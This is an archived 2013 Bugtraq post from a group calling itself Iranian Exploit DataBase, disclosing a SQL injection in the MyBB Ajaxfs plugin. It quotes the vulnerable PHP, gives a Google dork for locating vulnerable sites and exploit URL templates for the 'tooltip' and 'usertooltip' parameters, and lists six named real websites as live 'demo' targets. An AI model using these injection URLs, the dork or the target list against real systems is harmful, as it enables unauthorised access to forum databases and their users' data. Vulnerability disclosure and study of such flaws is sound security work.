lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201311200502.rAK52bCI032100@sf01web3.securityfocus.com>
Date: Wed, 20 Nov 2013 05:02:37 GMT
From: iedb.team@...il.com
To: bugtraq@...urityfocus.com
Subject: Mybb Ajaxfs Plugin Sql Injection vulnerability

a Sql Injection vulnerability In Mybb Ajaxfs Plugin Version 2.0


#################################
#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@ 
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@ 
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@ 
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#
#####################################
 
# Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability
 
# Author : Iranian Exploit DataBase
 
# Discovered By : IeDb
 
# Email : IeDb.Team@...il.com  -  o0_iedb_0o@...oo.com
 
# Home : http://iedb.ir   -   http://iedb.ir/acc
 
# Fb Page : https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538
 
# Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2
 
# Security Risk : High
 
# Tested on : Linux
 
# Dork : inurl:ajaxfs.php
 
#################################
 
1)
 
  if(isset($_GET['tooltip']))
    {
    $pid=$_GET['tooltip'];
    $query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");
 
 
2)
 
 if(isset($_GET['usertooltip']))
    {
    $uid=$_GET['usertooltip'];
    $query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");
 
http://localhost/Upload/ajaxfs.php?usertooltip=1'
 
    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
 
Google DORK : inurl:ajaxfs.php
 
 
# Exploit :
 
# http://site.com/mybb/ajaxfs.php?tooltip=[sql]
 
# http://site.com/mybb/ajaxfs.php?usertooltip=[sql]
 
# Dem0 :
 
# http://www.forum.birahy.com/ajaxfs.php?tooltip=mostreffer'
 
# http://www.tamishe.ir/ajaxfs.php?tooltip=mostreffer'
 
# http://www.opencartvn.com/forum/ajaxfs.php?tooltip=mostreffer'
 
# http://freenimbuzz.takbb.com/_mybb_/ajaxfs.php?tooltip='
 
# http://dvlottery.us/ajaxfs.php?tooltip=13349'
 
# http://www.taltallon.com/forum/ajaxfs.php?tooltip=mostreffer'
 
#################################
 
# Tnx To : All Member In Iedb.ir/acc & Iranian Hackers
 
#################################

# Exploit Archive = http://www.iedb.ir/exploits-889.html

#################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ